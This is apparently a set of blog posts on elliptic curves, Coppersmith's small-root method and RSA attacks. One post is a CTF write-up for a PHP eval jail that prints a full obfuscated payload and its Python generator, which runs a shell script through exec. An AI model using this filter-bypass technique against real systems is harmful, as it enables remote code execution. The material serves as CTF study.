To recover the \(y-\)coordinate, we just substitute the equation back to the line \(y=\lambda x+\nu\), and get \(y_3=\lambda x_3 + \nu\), then expand to get \(y_3 = \lambda x_3 + y_1 - \lambda x_1 = \lambda (x_3-x_1) + y_1\).
Then \(P+Q\) will be this point reflected along the x-axis, so we just get the negative of \(y_3\), and we get our desired \(P+Q=(x_3, \lambda(x_1-x_3)-y_1)\).
We note that in the algorithm for point addition, we actually do not use the value of \(B\). This is curious, as if the point we are “adding” in the curve are actually not in the curve by using a different \(B\), the formula is still the same.
We can define an elliptic curve over the rationals (in computers we use rational numbers instead of real numbers as we can’t represent real numbers accurately anyway). Let’s define the curve \(y^2 = x^3-x+1\) as \(E\), and take the points \((0,1)\) and \((3,5)\) on the curve. We can also see the discriminant of \(E\) is \(-368\).
Note that \(P\) is represented as \((0:1:1)\) instead of just \((0,1)\), but we can ignore the third coordinate for now.
Let’s add \(P\) and \(Q\) to verify our above calculation.
So far we are concerned with elliptic curves over the reals. However, in cryptography, we often need to work with elliptic curves over a finite field \(\mathbb{F}_p\) for \(p\) prime. Recall that \(\mathbb{F}_p\) is just the set \(\{0,1,\cdots,p-1\}\) with addition and multiplication done mod \(p\).
We can, of course, define an elliptic curve over \(\mathbb{F}_p\) using the same definition as for the reals, and for the point addition, we use the same formulae, except the division becomes inverse. All the theories of addition and group structure applies.
In the case of \(\mathbb{F}_p\), the elliptic curve only consists of finitely many points, as \(\mathbb{F}_p^2\) only has \(p^2\) points anyway. Moreover, since each \(x\) only corresponds to 2 \(y\) (because any polynomial over degree \(d\) over a field has at most \(d\) solutions), the number of points are at most \(2p+1\).
We have a even better bound of the maximum number of points on the curve over \(\mathbb{F}_p\) (even with \(\mathbb{F}_{p^n}\) for any \(n\) positive integer), and this is called the Hasse’s Theorem: If \(\#E(\mathbb{F}_q)\) is the number of points on an elliptic curve over \(\mathbb{F}_q\) for \(q\) prime or power of primes, then \[ (q-1)-2\sqrt{q}\leq \#E(\mathbb{F}_q)\leq (q-1)+2\sqrt{q}\]
On the other hand, we may also want to know the structure of \(E(\mathbb{F}_p)\). Actually, it is either cyclic, or a product of two cyclic groups, but we will not discuss this here.
It also makes sense to define the scalar multiple of a point \(P\) to just be adding the point \(P\) to itself a number of times. We use the notation \([n]P = \underbrace{P+\cdots+P}_{n\text{ times}}\) for positive \(n\), and \([n]P = \underbrace{-P-\cdots-P}_{\lvert n\rvert\text{ times}}\) for negative \(n\). We can also say that \([0]P=\mathcal{O}\).
Are there any fast ways to compute \([n]P\)? The naive way is to add \(P\) to itself \(n\) times. But just as the repeated squaring method in modular exponentiation, we can also do this similar approach, and we call this the double-and-add algorithm.
let bits be the bit representation of \(n\)
let \(P\) be the point to be multiplied
let R = \(\mathcal{O}\).
for i from 0 to bits.length():
\(R = [2]R\)
if bits[i] == 1:
\(R = R + P\)
return \(R\)
We may have that \([n]P=\mathcal{O}\) for some positive \(n\). The smallest positive \(n\) such that \([n]P=\mathcal{O}\) is called the order of \(P\). For elliptic curve over finite field, a point will have finite order. If there are no \(n\) such that \([n]P=\mathcal{O}\), then we say the point has infinite order.
If the order of the point is equal to the number of points \(N\) on the curve, this means that \([m]P\) can reach all the points in the curve as \(m\) goes from \(1\) to \(N\), then we call this \(P\) a generator of the elliptic curve. Note that we do not always have one generator, as \(E(\mathbb{F}_p)\) may not be cyclic as mentioned above.
For example, we can use the curve \(y^2=x^3-x+1\) again, and we note that the point \((3,5)\) over the rationals has infinite order. Actually, we can even see that only the point at infinity (represented as \((0:1:0)\)) has finite order (actually order is just 1).
However, over \(\mathbb{F}_7\), we can find that the point \((3,5)\) has order 3.
We can also find that \(E(\mathbb{F}_7)\) has 12 points, is isomorphic to the group \(\mathbb{Z}/12\mathbb{Z}\) (which is cyclic) and that \((5,3)\) is the generator of \(E(\mathbb{F}_7)\) (i.e. has order 12).
Elliptic curves over rationals may still have points of finite order. For example, for the curve \(y^2=x^3+1\), there are 6 points of finite order. The point \((2,-3)\) has order 6. We can verify this by multiplying 6 to the point \((2,-3)\) to get the point at infinity.
In fact, a much stronger result is true.
Theorem (Mordell-Weil): For \(K\) a global field, \(E(K)\) is finitely generated.
Let’s specialise to the field of rational numbers \(\mathbb{Q}\), which is indeed a global field, this says that \(E(\mathbb{Q})\) consists of points of finite order (the torsion subgroup), denoted \(E(K)_{\text{tors}}\), and the infinite part will be isomorphic to \(\mathbb{Z}^r\) for some non-negative integer \(r\).
For elliptic curves over \(\mathbb{Q}\), the points of finite order \(P=(x,y)\) will have the following two conditions:
Corollary (Lutz, Nagell):
- \(x\) and \(y\) are both integers.
- Either \([2]P=\mathcal{O}\), or \(y^2\) divides \(4A^3+27B^2\).
We have a strong theorem about the torsion subgroup:
Theorem (Mazur):
The structure of the torsion subgroup of elliptic curve over \(\mathbb{Q}\) can only be (isomorphic to) one of the following 15 groups:
- \(\mathbb{Z}/n\mathbb{Z}\) for \(n=1,2,\cdots,9,10,12\).
- \(\mathbb{Z}/2\mathbb{Z}\times \mathbb{Z}/2n\mathbb{Z}\) for \(n=1,2,3,4\).
But we shall explore no further in this direction.
This time we have explored the very basic concepts of the elliptic curve, and how a group operation is defined over it. However this still leave some question unanswered.
Actually, what is the point at infinity really doing? It magically makes the elliptic curve into a group, because indeed sometimes you really do not have the third point of intersection of the line and the curve. Is there any geometric meaning?
Why are the points represented as \((x:y:1)\) and infinity as \((0:1:0)\)?
We will answer this question in the next part.
Silverman, J. H. (2009). The arithmetic of elliptic curves (Vol. 106, pp. xx+-513). New York: Springer.
The correct definition of elliptic curve considers a field \(K\), then define an elliptic curve over \(K\), and consider all the solutions of the curve where the coordinates are in \(\bar{K}\), the algebraic closure of \(K\) (the smallest field containing \(K\) such that it is algebraically closed: every polynomial with coefficients in that field has a root). However we shall not consider this as in the case of \(\mathbb{Z}/p\mathbb{Z}\), we only care about solutions in \(\mathbb{Z}/p\mathbb{Z}\). ↩
Prerequisite: Coppersmith’s Method (Part I): Introduction
In this post, you just need to remember that the first vector returned by the LLL algorithm will satisfy \[ |b_1| \leq 2^{\frac{n-1}{4}}(\det L)^{\frac{1}{n}}\]And that LLL algorithm runs in polynomial time of \(n\) (the dimension of lattice) and \(\log\max\limits_{b_i\in B}\|b_i\|\) (the log of length of largest vector in the input).
The proofs we are going to do today are constructive, meaning that we are creating an algorithm that are able to solve our problem. The conditions are there because the algorithm requires it, and so the logic may seem reversed (in fact it is kind of self-referential) if you do not have much mathematical maturity. Kind of like this:
Recall: We use the convention that \(F(x)=\sum\limits_{i=0}^d a_i x^i\) be polynomial with integer coefficients with degree \(d\) (so \(a_d\neq 0\)). Let \(x_0\) be a root of \(F(x)\equiv 0\pmod{N}\) such that \(\lvert x_0\rvert < X\) for some integer \(X\). For that \(X\), we associate the polynomial \(F\) with the vector \(b_F = (a_0, a_1X, a_2X^2, \cdots, a_d X^d)\), and we may use the two notations interchangeably. The norm of a vector \(v=(v_1,\cdots v_n)\) is denoted \(\vert\vert v\rvert\rvert = \sqrt{\sum\limits_{i=1}^n v_i^2}\).
Theorem (Howgrave-Graham) If \(\lvert\lvert b_F\rvert\rvert < \frac{N}{\sqrt{d+1}}\), then \(F(x_0)=0\) over the integers (instead of mod \(N\) only).
The proof can be founded in the first part and is not difficult, but let’s also include it here for self-containedness.
Proof First we note that \(\sum\limits_{i=1}^n x_i \leq \sqrt{n \cdot \sum\limits_{i=1}^n x_i^2}\) by Cauchy-Schawarz inequality. Then
\[\begin{align*} \lvert F(x_0)\rvert =& \left\lvert \sum\limits_{i=0}^d a_i x_0^i\right\rvert\\ \leq& \sum\limits_{i=0}^d \lvert a_i\rvert\ \lvert x_0^i\rvert\\ < &\sum\limits_{i=0}^d \lvert a_i\rvert X^i\\ \leq &\sqrt{d+1} \lvert\lvert b_F\rvert\rvert\text{ (By the above lemma)}\\ \leq &\sqrt{d+1}\frac{N}{\sqrt{d+1}}\\ =& N \end{align*}\]So \(-N < F(x_0) < N\). Since \(F(x) \equiv 0\pmod{N}\) this means \(F(x_0) = 0\) (without mod).
Here we are using the lattice vectors to correspond to a polynomial. If all the basis vectors \(b_i\) (or equivalently polynomial) that span a lattice \(\mathcal{L}\) have a common root \(\alpha\), then any vectors in the lattice will also have the root \(\alpha\) (so \(b_i(\alpha)=0\) for all \(i\)), since \(\forall v\in L\), \[v(\alpha) = \sum_i c_i b_i(\alpha) = \sum_i c_i\cdot 0 = 0\] We will exploit this property in our derivation.
Let \(\displaystyle B=\left[\begin{array}{ccccc} N & & & \\ &N X & & & \\ && N X^{2} & & \\ & & & \ddots & \\ &&&&NX^{d-1}\\ a_{0} & a_{1} X & a_{1} X^{2} & \cdots & a_{d-1} X^{d-1} & X^{d} \end{array}\right]_{(d+1)\times(d+1)}\)
Since this matrix is lower-triangular, the determinant of \(B\) is the product of diagonals: \(\det B = N^d X^{\frac{d(d+1)}{2}}\).
Theorem Let \(G(x)\) be the polynomial corresponding to \(b_{1}\) after LLL on \(L(B)\) . Set \(C_{1}(d)=2^{-\frac{1}{2}}(d+1)^{-\frac{1}{2}}\). If \[\displaystyle X<C_{1}(d) N^{\frac{2}{d(d+1)}},\]
any root \(x_{0}\) of \(F(x) \bmod N\) such that \(\|x\|<X\) satisfies \(G(x)=0\) in \(\mathbb{Z}\).
Proof: After performing LLL on \(B\), the shortest vector \(b_1\) (which will correspond to a polynomial \(G\)) will satisfy \(\quad\left\|b_{1}\right\| \leq 2^{\frac{n-1}{4}}(\det L)^{\frac{1}{n}}=2^{\frac{d}{4}} N^{\frac{d}{d+1}} X^{\frac{d}{2}}\) (as \(n=d+1\)). To satisfy Howgrave-Graham, need
\[\left\|b_{1}\right\|<\frac{N}{\sqrt{d+1}}\]If \(\quad\left\|b_{1}\right\| \leq 2^{\frac{d}{4}} N^{\frac{d}{d+1}} X^{\frac{d}{2}} < \frac{N}{\sqrt{d+1}}\), then the condition will be satisfied. Now
\[\begin{align*} 2^{\frac{d}{4}} N^{\frac{d}{d+1}} X^{\frac{d}{2}} < &\frac{N}{\sqrt{d+1}}\\ 2^{\frac d4} X^{\frac d2} \sqrt{d+1} <& N^{1-\frac{d}{d+1}}\\ \left(2^{\frac 12}(d+1)^{\frac 1d}\right)^{\frac{d}{2}} X^{\frac d2} <& N^{\frac{1}{d+1}}\\ C_1(d)^{-\frac d2} X^{\frac d2} <& N^{\frac{1}{d+1}}\\ X^{\frac d2} <&C_1(d)^{\frac d2}N^{\frac{1}{d+1}}\\ X < & C_1(d) N^{\frac{2}{d+1}} \end{align*}\]So \(X < C_1(d) N^{\frac{2}{d+1}}\) will ensure the condition in Howgrave-Graham theorem will hold, then the statement in the theorem will hold.\qed
The seems like a good method to recover small roots of polynomials mod \(N\)! However, the bound for \(X\) is very small: we have \(X\approx N^{\frac{1}{d^2}}\). For example, for \(N=10001\) and \(d=3\), the bound for \(X\) is only \(2.07\), which is not useful at all.
The remedy here is to note that by increasing the dimension \(n\) of \(B\), the resulting bounding for \(X\) will be higher.
One idea would be to use higher order polynomials: apart from using the polynomials \(g_i(x)=Nx^{i}\) and \(F(x)\) itself, we also use the x-shifts of \(F\), i.e.\[xF(x), x^2F(x),\cdots,x^kF(x)\] Then the right hand side Howgrave-Graham bound will be \(\frac{N}{\sqrt{d+1+k}}\). This way the resulting bound is higher, making \(X\approx N^{\frac{1}{2d-1}}\) (note that the power of the modulus is unchanged)! For example, again for \(N=10001, d=3\), if we add 3 x-shifts of \(F\), the new bound will be about \(3.11\).
The second idea is to increase the power of \(N\) on the right hand side by taking powers of \(F\). This means that instead of considering polynomials mod \(N\), we are considering mod \(N^h\) for some positive integers \(h\). Note that \(F(x)\equiv 0\pmod{N}\iff N^{h-k}F^k(x)\equiv 0\pmod{N^h}\) for any \(0\leq k\leq h\). So we can certainly work mod \(N^h\), have a bigger bound for the small roots, and the small roots found is also a root of the original polynomial mod \(N\).
By combining the two ideas, we will get a much higher bound. This is exactly the method used in Coppersmith’s Theorem.
Theorem (Coppersmith) Let \(0<\varepsilon < \min\{0.18,\frac 1d\}\). Let \(F(x)\) be a monic irreducible polynomial of degree \(d\) with root(s) \(x_0\) modulo \(N\) such that \(\lvert x_0\rvert < \frac 1 2 N^{\frac 1 d - \varepsilon}\). Then such root(s) can be found in polynomial time of \(d\), \(\frac 1 \varepsilon\) and \(\log N\).
We note that even though we have a \(\varepsilon\) term, we can “improve” the bounded to \(N^{\frac 1d}\) by exhaustive search on the top few bits of \(x_0\).
Let \(h\) be an integer (to be determined later) depending on \(d\) and \(\varepsilon\). We consider the lattice containing vectors corresponding to the polynomials\[G_{ij}(x)=N^{h-1-j}F(x)^jx^i\]where \(0 \leq i<d, 0\leq j< h\). As above, if \(x_0\) is a solution to \(F(x)\equiv 0\pmod{N}\), then \(G_{ij}(x_0)\equiv 0\pmod{N^h}\). We also notice that the degree of \(G_{ij}\) is \(dj+i\), so the degree runs through 0 to \(dh-1\) exactly once.
In this way, the polynomials corresponding to (row) vectors \(b_{G_{ij}}\), and the matrix formed by the vectors can be rearranging the rows to form a lower triangular matrix with diagonals being \(N^{h-1-j}X^{dj+i}\). The determinant of this matrix is therefore \(N^{\frac{dh(h-1)}{2}}X^{dh}\), where this lattice has dimension \(dh\).
Now as before, run LLL on the lattice, and the first vector \(b_1\) will satisfy \(\|b_1\|<2^{\frac{dh-1}{4}}\left(\det L\right)^{\frac{1}{dh}}=2^{\frac{dh-1}{4}}N^{\frac 12 (h-1)}X^{\frac{dh-1}{2}}\). This vector corresponds to a polynomial \(G(x)\) with \(G(x_0)\equiv 0\pmod{h}\). If \(\|b_1\|\leq \frac{N^h}{\sqrt{dh}}\), then by Howgrave-Graham \(G(x_0)=0\) over the integers. So our goal becomes
\[\begin{align*} 2^{\frac{dh-1}{4}}N^{\frac 12 (h-1)}X^{\frac{dh-1}{2}} <& \frac{N^h}{\sqrt{dh}}\\ \sqrt{dh} 2^{\frac{dh-1}{4}}X^{\frac{dh-1}{2}} <& N^{\frac 12 (h-1)}\\ c(d,h)X<& N^{\frac{h-1}{dh-1}} \end{align*}\]Where \(c(d,h)=\left(\sqrt{dh}2^{\frac{dh-1}{4}}\right)^{\frac{2}{dh-1}}=\sqrt{2}(dh)^{\frac{1}{dh-1}}\).
Now the power of \(N\) is
\[\begin{align*} \frac{h-1}{dh-1} =& \frac{d(h-1)}{d(dh-1)}\\ =& \frac{dh-1+1-d}{d(dh-1)}\\ =&\frac 1d - \frac{d-1}{d(dh-1)} \end{align*}\]If we set \(\varepsilon = \frac{d-1}{d(dh-1)}\), then \(dh = \frac{d-1}{d\varepsilon}+1\). So \(c(d,h)\) becomes \[\sqrt{2}(dh)^{\frac{1}{dh-1}} = \sqrt{2}\left(1+\frac{d-1}{d\varepsilon}\right)^{\frac{d\varepsilon}{d-1}}=\sqrt{2}(1+u)^{1/u}\] By letting \(u=\frac{d\varepsilon}{d-1}\). Going back to the original inequality on \(X\), we have \(c(d,h)X< N^{\frac{h-1}{dh-1}}\), substituting the variable nets \[X < \frac{1}{c(d,h)}N^{\frac 1d - \epsilon}\]
Our original theorem statement requires \(X<\frac 12 N^{\frac 1d - \epsilon}\), so it seems that we will need \(c(d,h)\leq 2\). Luckily \(c(d,h)=\sqrt{2}(1+\frac 1u)^u\), and \((1+\frac 1u)^u \leq \sqrt{2}\) for \(0\leq u\leq 0.18\). \(u=\frac{d\varepsilon}{d-1}\) so \(\varepsilon \leq (1-\frac 1d)0.18\) so we just need to make sure that \(\varepsilon \leq 0.18\), which is the case in the assumption.
Since \(h = \frac{d-1}{d^2\varepsilon}+\frac 1d = \frac{1}{d\varepsilon} - \frac{1}{d^2\varepsilon} + \frac 1d \approx \frac{1}{d\varepsilon}\), setting \(h\) to be larger than \(\frac{1}{d\varepsilon}\) will make Howgrave-Graham work.
For the polynomial time part, we note that the dimension of \(L\) (the lattice to be reduced) has dimension \(dh\approx\frac 1\varepsilon\), and the coefficients of the polynomials are bounded by \(N^h\). QED.
Next time we will try to prove the recovery of \(N=pq\) given partial knowledge of \(p\).
Galbraith, S. D. (2012). Mathematics of public key cryptography. Cambridge University Press.
Note that \(h\) is “to be determined later”. Indeed it seems that we should have chosen \(h\) first, then to check if the condition of Howgrave-Graham is satisfied given the constraints of the theorem. However we are actually deriving the value of \(h\) that fits the condition. Then if we go hack and substitute the instances of (the unknown) \(h\) with the values we got at the end, we will be able to complete the proof.
Here we end this post with an example of these “to be determined later” that appears in mathematics. In calculus (or actually basic mathematical analysis), we say the limit of a function \(f(x)\) at a point \(a\) is \(L\) if for any \(\varepsilon>0\), there exists a \(\delta>0\) (that depends on \(\varepsilon\) only), such that for any \(x\) such that \(0<\lvert x-a\rvert < \delta\), we have that \[\lvert f(x)-L\rvert < \varepsilon.\]
The statement just means that, intuitively, that the value of \(f(x)\) can get arbitrarily close to the value \(L\), if \(x\) is also close enough to \(a\). This is like a challenge-response protocol, where we give a desired distance away from \(L\), and we should provide a response that consists of the range of \(x\) (near \(a\)) that can achieve the desired distance.
For instance, let’s try to prove that \[\lim\limits_{x\to 1}\frac 1x = 1\] with the definition.
For any \(\varepsilon>0\), \(\left\lvert \frac 1x - 1 \right\rvert = \left\lvert \frac{x-1}{x} \right\rvert = \frac{\lvert x-1 \rvert}{\lvert x \rvert}\).
If \(\lvert x-1\rvert < \frac 12\), then \(\frac 12 < x < \frac 32\). In particular \(x > \frac 1 2\), so with that assumption, we can have \(\frac{\lvert x-1 \rvert}{\lvert x \rvert} < 2\lvert x-1 \rvert\).
If further \(\lvert x-1 \rvert < \frac \varepsilon 2\), then \(2\lvert x-1 \rvert < \varepsilon\).
Now when we look back at the derivations, we find that \(\delta\) should be less than both \(\frac 12\) and \(\frac\varepsilon 2\), so that the requirement of \(\left\lvert \frac 1x - 1 \right\rvert < \varepsilon\) is satisfied. Let’s see how we will actually present the proof:
Proof: For any \(\varepsilon>0\), set \(\delta = \min\{\frac 12, \frac\varepsilon 2\}\). Then for any \(x\) such that \(0 < \lvert x-1\rvert < \delta\),
\[\begin{align*} \left\lvert \frac 1x - 1 \right\rvert =& \left\lvert \frac{x-1}{x} \right\rvert\\ =& \frac{\lvert x-1 \rvert}{\lvert x \rvert}\\ <& 2\lvert x-1 \rvert\\ <& \varepsilon \end{align*}\]So \(\lim\limits_{x\to 1}\frac 1x = 1\) by definition.
See how the logic is kind of reversed? This is indeed because of the fact that we have already derived the whole thing in order to figure out the required value of \(\delta\) to satisfy the condition.
]]>I wrote this write-up back in 28 Apr 2019 after the CTF ends. At the time I was still very new to CTF (now also very new), so the formatting and the quality of this write-up is not so good. This is just for my archive purposes.
The code reads
<?=@preg_match('/^[\(\)\*\-\.\[\]\^]+$/',($_=$_GET["🥥"]))&&!(strlen($_)>>10)?@eval("set_error_handler(function(){exit();});error_get_last()&&exit();return $_;"):!highlight_file(__FILE__);
In pseudocode, we can write this as
if input contains only ()*-.[]^ and length of input < 1024:
(with exit on error) eval input and print the return value
else:
show the source code
Our goal is to execute /checksec.sh
(the common goal of the whole CTF).
In short, we can run wherever we want, but the command need to contain only ()*-.[]^
, and the command needs to be less than 1024 characters. Also, any error/warning/notice will cause the program to exit.
The idea of restricting the allowed characters is not new: perhaps the most famous one is JSFuck, which can turn any javascript code into valid js codes, but using ()[]!+
. Just looking from it, it seems that we are even better off than JSFuck, since we have more characters. But actually no. The reason is that we don’t have +
, instead we get this awkward charset of *-.^
. Even the simplest number 3
can only be constructed by 10-1-1-1-1-1-1-1
instead of the obvious 1+1
.
With inspirations from JSFuck, trial and error, and the great behavior of php , we can begin to assemble some simple characters:
0 can be expressed by []^[]
, and
1 can be expressed by []^[[]]
.
With the help of .
, which can act as the concatenation operator for strings, we can express 10 by []^[].[]^[[]]
. Then we can get the other numbers by repeatedly subtract 1 from 10 multiple times.
So for example, 6 is \(10-1-1-1-1\) or equivalently, \(7-1\) , or ([]^[].[]^[[]])-[]^[[]]-[]^[[]]-[]^[[]]-[]^[[]]
. So we can construct all the numbers we want.
Now we want some English letters. Luckily we have floating point numbers, which has INF
and scientific notations like 1.234E+45
. So we now we can use I,N,F,.,E,+ as well. Of course we cannot do something like (INF)[0]
since INF is a number (a float), but we can concatenate a 0 at the back to make it a string, i.e. do (INF . 0)[0]
, which is equivalent to 'INF0'[0]
. At the same time, observe that we can use -
just by using (-1 . 0)[0]
.
Now, by using what we have, we can try to construct our payload. We should do something like exec('/checksec.sh')
. Although we can only input string, not identifiers, doing 'exec'('/checksec.sh')
will still result in a function call in php. Also, we can try to reduce the character we use by using filename substitution in bash, i.e. using *
to match our file. So now we can reduce the payload to 'exec'('/*.*')
.
Now we need to construct the characters that we need: exc/*.
. php functions are case insensitive so “EXC” will also work. It left us to construct “xc/*”. The main technique for doing so is to do xor:
\[x=y \wedge z \]
, where x is the character we want, and y, z are the characters we have. Notice that
\[x = y \wedge z \iff x \wedge y = z\]
So we can try to xor the characters we want with the characters we have, and hope that we get some characters that we have by some trial-and-error. For example: \(c \wedge N = -\), so \(c = N \wedge -\), and we have both ‘N’ and ‘-‘ already.
Another way is to get the characters we want by xor-ing neighboring characters by a small ‘number’, e.g.:
\[* = \cdot \wedge 0\times 04 = \cdot \wedge ( 4 \wedge 0)\]
Here we need the string '1'
and '5'
, so we need to do '.' xor ((4 . 0) xor (0 . 0))
.
By now we are able to construct all the characters needed for our payload. But if we check the length of our payload, it will be something like 12xx characters (originally with all lower case characters, the payload is 22xx characters long) ! We need to reduce the character count.
Now we turn to the hint by the author:
/*.*
For the first hint, notice that we can reduce the payload to just /*h
and it will still expand to /checksec.sh
correctly.
For the second hint, observe that in php, a longer string xor a shorter string gives us a shorter string. In fact, we made use of this fact in '*' = '.' xor ((1 . 0) ^ (5 ^ 0))
.
The third hint (along with the second one) is the one that helped to drop the length to below 1024. First we know that we can construct /
and *
by '/' = '-' ^ "\x02"
and '*' = '.' ^ "\x04"
. A naive attempt is to combine to yield
\[/* = -. \wedge 0\times0204 = -. \wedge 24 \wedge 00\]
, but notice that the number of length of characters required to construct this is the same! Here, a big observation is that we can have
\[/* = -. \wedge 24 \wedge 00 = -4 \wedge 2. \wedge 00\]
Since we can use a long string for the xor, provided that we have a ‘00’ to restrict the length of the final output of the xor to 2, we can get 2. by finding a floating point number 2.???????E+???
, so we have
\[/* = -4 \wedge 2.\text{????}\textbf{E+}\text{????} \wedge 00\]
And constructing -4 and a floating point number starting with 2. take much less space than the individual numbers 2,4 and the character -
and .
. The final payload has length 928. On a high level, it is 'ExEc'('/*h')
. In full, the payload are as follows (for those who are too lazy to run the python script themselves):
((((([]^[[]]).([]^[]))**(([]^[[]]).([]^[]).([]^[])).([]^[]))[([]^[[]]).([]^[])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])]).((((([]^[[]]).([]^[])-([]^[[]]))**(([]^[[]]).([]^[]).([]^[]).([]^[])).([]^[]))[([]^[])])^(([]^[[]]).([]^[]))).(((([]^[[]]).([]^[]))**(([]^[[]]).([]^[]).([]^[])).([]^[]))[([]^[[]]).([]^[])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])]).((((([]^[[]]).([]^[])-([]^[[]]))**(([]^[[]]).([]^[]).([]^[]).([]^[])).([]^[]))[([]^[[]])])^(((-([]^[[]])).([]^[]))[([]^[])])))((((-(([]^[[]]).([]^[])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]]))).([]^[]))^((((([]^[[]]).([]^[])-([]^[[]])))**(([]^[[]]).([]^[]).([]^[]))).([]^[]))^(([]^[]).([]^[]))).((((([]^[[]]).([]^[]))**(([]^[[]]).([]^[]).([]^[])).([]^[]))[([]^[[]])])^(((([]^[[]]).([]^[])-([]^[[]]))**(([]^[[]]).([]^[]).([]^[]).([]^[])).([]^[]))[([]^[[]]).([]^[[]])^(([]^[[]]).([]^[])-([]^[[]]))])))
which do give us the flag as desired. You can find the code that generates the payload below:
zero = "([]^[])"
one = "([]^[[]])"
ten = f"{one}.{zero}"
nine = f"{ten}-{one}"
eight = f"{nine}-{one}"
seven = f"{eight}-{one}"
six = f"{seven}-{one}"
five = f"{six}-{one}"
four = f"{five}-{one}"
three = f"{four}-{one}"
two = f"{one}.{one}^({nine})" # A small optimization over 3 - 1
INF = f"({nine})**({one}.{zero}.{zero}.{zero})"
I = f"({INF}.{zero})[{zero}]" # used for x
N = f"({INF}.{zero})[{one}]" # used for e,c
F = f"({INF}.{zero})[{two}]"
sf = f"({one}.{zero})**({one}.{zero}.{zero}).{zero}" # 1.0E+100
dot = f"({sf})[{one}]"
E = f"({sf})[{three}]"
plus = f"({sf})[({four})]"
minus = f"((-{one}).{zero})[{zero}]"
sf2 = f"(({nine}))**({one}.{zero}.{zero})" # 2.<whatever>
slashstar = f"((-({four})).{zero})^(({sf2}).{zero})^({zero}.{zero})"
c = f"({N})^({minus})"
x = f"({I})^({one}.{zero})"
h = f"({dot})^({F})"
payload = f"(({E}).({x}).({E}).({c}))(({slashstar}).({h}))"
print(f"total: {len(payload)}")
print(payload)
You can find (sage) code that implements the below-mentioned attack on https://github.com/mimoo/RSA-and-LLL-attacks, although they used a weaker (read: more flexible) version of the statements.
Prerequisite: Lattice-based Cryptography basics
Let’s say we have a polynomial \(f(x) = \sum_{i=0}^n a_i x^i\) where \(a_n\neq 0\). Then \(n\) is called the degree of \(f\). We can restrict the domain of \(x\) and the coefficient^{1} to integers mod \(n\), so we can talk about the roots of a polynomial \(f(x)\equiv 0\pmod{n}\).
But how about if we do not know the factorization? The answer is that in general it is hard to solve polynomials if we do not have the factorization. To see why, we note that
has 4 solutions (\(p\) and \(q\) are primes). If \(a\) is a solution to \(f(x)=x^2-1\) mod \(pq\), then \((a-1)(a+1)\equiv 0\pmod{pq}\), so \(a-1\) is divisible by either \(p\) or \(q\) (but not both), then we can factor \(pq\). This shows that solving polynomials mod \(N\) with unknown factorization in general is as hard as factorizing large integers, which we also do not have a fast algorithm for. However, as always, if we can relax our conditions, we may be able to find some solutions.
In the coppersmith method case, we are restricted to finding small roots to a polynomial.
Exercise
- Show that if \(p\) is a prime, then \(x^2-1\equiv 0\pmod{p}\) has exactly 2 solutions (name \(1\) and \(-1\)).
- Use the above to proof that if \(n=pq\) is a product of 2 primes, then \(x^2-1\equiv 0\pmod{n}\) has 4 solutions.
Most specifically, let \(F(x)\) have integer coefficients be monic and irreducible. And we want to examine the equation
Definition (Monic) A monic polynomial has the leading coefficient (the coefficient corresponding to the largest term) to be 1.
Actually if the leading coefficient is not 1, we can just multiply the whole function by the inverse of that coefficient, and the polynomial will have the same root (if the gcd of it and \(N\) is 1). If the gcd is not 1 then we just found a factor of \(N\).
Definition (Irreducible) A polynomial \(F(x)\) (with integer coefficients) is irreducible if whenever \(F(x)=g(x)h(x)\), one of \(g(x)\) or \(h(x)\) must be the constant polynomial.
This looks like the usual prime number definition, because in the case of integers, prime and irreducible are the same. Here we make the distinction.
Then we can formulate the main result of Coppersmith.
Theorem (Coppersmith) Let \(0<\varepsilon < \min\{0.18,\frac 1d\}\). Let \(F(x)\) be a monic irreducible polynomial of degree \(d\) with root(s) \(x_0\) modulo \(N\) such that \(\lvert x_0\rvert < \frac 1 2 N^{\frac 1 d - \varepsilon}\). Then such root(s) can be found in polynomial time of \(d\), \(\frac 1 \varepsilon\) and \(\log N\).
Let’s use the RSA setup (\(n=pq\), \(de\equiv 1\pmod{\phi(n)}\), \(E_k(m)=m^e\pmod{N}\), and let the public exponent \(e=3\). Say we have a small message \(m\) to encrypt, and \(m < N^{\frac{1}{3}}\).
If we use textbook RSA, the plaintext can be directly recovered by taking cube root. Suppose we pad the message with ‘1’ bits on the left until the padded message has about the same size as \(N\). Then we have the equation
where we use \(P\) to denote the padding, so
Rearrange to get
which is a cubic polynomial! Check to see the condition of Coppersmith’s theorem is satisfied, so we can apply that to recover the plaintext.
How about when the message is large? If the padding is linear (perhaps just append or prepend known bits), given at least \(e\) ciphertexts from the same plaintext, we can still recover the message.
Theorem Given \(N_1,\cdots N_k\) are pairwise coprime integers, and \(g_i(x)\) be polynomials of degree at most \(q\). If \(M<\min\{N_1,\cdots,N_k\}\) and \(g_i(M)\equiv 0\pmod{N_i}\) for each i, and \(k>q\), then there exists an efficient algorithm to compute \(M\).
Proof Use Chinese remainder theorem to construct \(g(x)\) such that \(g(M)\equiv 0\pmod{N_1 N_2\cdots N_k}\), then \(M\) and \(g\) satisfies the requirement of Coppersmith’s theorem. Use Coppersmith’s method to recover \(M\).
Another version of Coppersmith’s theorem concerns small roots to bivariate polynomials mod \(N\). Here we have \(F(x,y)\) with integer coefficients again. We can again find small roots for the polynomial mod \(N\).
Theorem (Coppersmith)
Let \(F(x,y)\) be polynomial with integer coefficients and \(d\) natural number such that both \(\deg_x F, \deg_y F \leq d\). Write \(F(x,y)=\sum_{0\leq i,j\leq d} F_{i,j} x^i y^j\) and define \(W=\max\limits_{0\leq i,j\leq d} \vert F_{i,j}\vert X^i Y^j\) for each \(X\) and \(Y\) natural numbers.
If \(XY<W^{\frac{2}{3d}}\) then we can find roots of \(F\) mod \(N\) such that the roots \((x_0,y_0)\) satisfies \(\vert x_0\vert \leq X\) and \(\vert y_0\vert \leq Y\) that runs in polynomial time of \(\log W\) and \(2^d\).
